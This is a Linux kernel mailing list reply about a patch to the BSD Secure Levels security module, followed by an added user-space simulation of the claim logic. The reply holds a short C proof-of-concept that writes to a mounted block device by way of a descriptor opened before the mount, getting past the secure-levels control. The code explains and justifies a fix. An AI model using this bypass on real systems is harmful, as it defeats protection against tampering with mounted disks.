On Mon, Feb 07, 2005 at 02:26:03PM -0800, Chris Wright wrote:
> * Michael Halcrow ([EMAIL PROTECTED]) wrote:
> > This is the third in a series of eight patches to the BSD Secure
> > Levels LSM. It moves the claim on the block device from the inode
> > struct to the file struct in order to address a potential
> > circumvention of the control via hard links to block devices. Thanks
> > to Serge Hallyn for pointing this out.
>
> Hard links still point to same inode, what's the issue that this
> addresses?

Actually, it turns out that hard links have nothing to do with the
vulnerability that this patch addresses:
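
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>   /* close(), write() */

int main(void)
{
        int fd1, fd2;
        int rc;

        /* Two opens of the same block device: one read-only, one read-write. */
        fd1 = open( "/dev/device", O_RDONLY );
        fd2 = open( "/dev/device", O_RDWR );

        /* Close the read-only descriptor while fd2 stays open. */
        close(fd1);

        /* Pause here; the block device is mounted during this wait. */
        getchar();

        /* Write through the descriptor that was opened before the mount. */
        rc = write( fd2, "0", 1 );
        printf( "write result: [%d]\n", rc );
        close( fd2 );
        return 0;
}
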
While the program is waiting for a keystroke, mount the block device.
Enter a keystroke. The result without the patch is 1, which is a
security violation. This occurs because the bd_release function will
bd_release(bdev) and set inode->i_security to NULL on the close(fd1).
Hence, we want to place the control at the level of the file struct,
not the inode.
Mike
.___________________________________________________________________.
Michael A. Halcrow
Security Software Engineer, IBM Linux Technology Center
GnuPG Fingerprint: 05B5 08A8 713A 64C1 D35D 2371 2D3C FDDA 3EB6 601D
The hokey pokey... What if that's really what it's all about?
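
A user-space model of the sequence in the message above, added here as an illustration; it is not part of the original message or of the seclvl patch. It replays open/open/close/mount/write with the claim marker kept on the inode versus on the file. The `model_*` names, the struct layouts, and the assumption that a held claim makes the mount fail are constructs of this example.

```c
#include <stdio.h>
/* User-space model only (assumption): simplified names and fields, not kernel code. */
enum policy { CLAIM_ON_INODE, CLAIM_ON_FILE };
struct bdev  { const void *holder; int holders; };
struct inode { struct bdev bdev; const void *i_security; };
struct file  { struct inode *inode; int writable; int claimed; };
/* Exclusive claim: a different holder is refused while the first still holds it. */
static int model_claim(struct bdev *b, const void *who) {
    if (b->holder && b->holder != who) return -1;
    b->holder = who; b->holders++;
    return 0;
}
static void model_release(struct bdev *b) {
    if (b->holders > 0 && --b->holders == 0) b->holder = NULL;
}
static void model_open(struct file *f, struct inode *i, int writable,
                       enum policy p, const void *task) {
    f->inode = i; f->writable = writable; f->claimed = 0;
    if (!writable || (p == CLAIM_ON_INODE && i->i_security == task)) return;
    if (model_claim(&i->bdev, task) != 0) return;  /* busy: no claim taken */
    if (p == CLAIM_ON_INODE) i->i_security = task; /* marker shared by every open */
    else f->claimed = 1;                           /* marker owned by this open */
}
static void model_close(struct file *f, enum policy p, const void *task) {
    struct inode *i = f->inode;
    if (p == CLAIM_ON_INODE && i->i_security == task) {
        model_release(&i->bdev);   /* any close by the task drops the claim */
        i->i_security = NULL;
    } else if (p == CLAIM_ON_FILE && f->claimed) {
        model_release(&i->bdev);   /* only the open that claimed releases it */
        f->claimed = 0;
    }
}
/* Replays the sequence from the message: 1 means a write reached a mounted device. */
static int replay(enum policy p) {
    struct inode dev = {0};
    struct file fd1, fd2;
    char task = 0, mounter = 0;                    /* addresses act as holder identities */
    model_open(&fd1, &dev, 0, p, &task);           /* O_RDONLY */
    model_open(&fd2, &dev, 1, p, &task);           /* O_RDWR */
    model_close(&fd1, p, &task);
    int mounted = model_claim(&dev.bdev, &mounter) == 0;  /* mount during getchar() */
    int rc = fd2.writable ? 1 : -1;                /* write on the already-open fd2 */
    return mounted && rc == 1;
}
int main(void) {
    printf("inode: %d, file: %d\n", replay(CLAIM_ON_INODE), replay(CLAIM_ON_FILE));
    return 0;
}
```

With the marker on the inode, closing the read-only descriptor releases the claim that the still-open writable descriptor depends on; with the marker on the file, that close has nothing to release.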

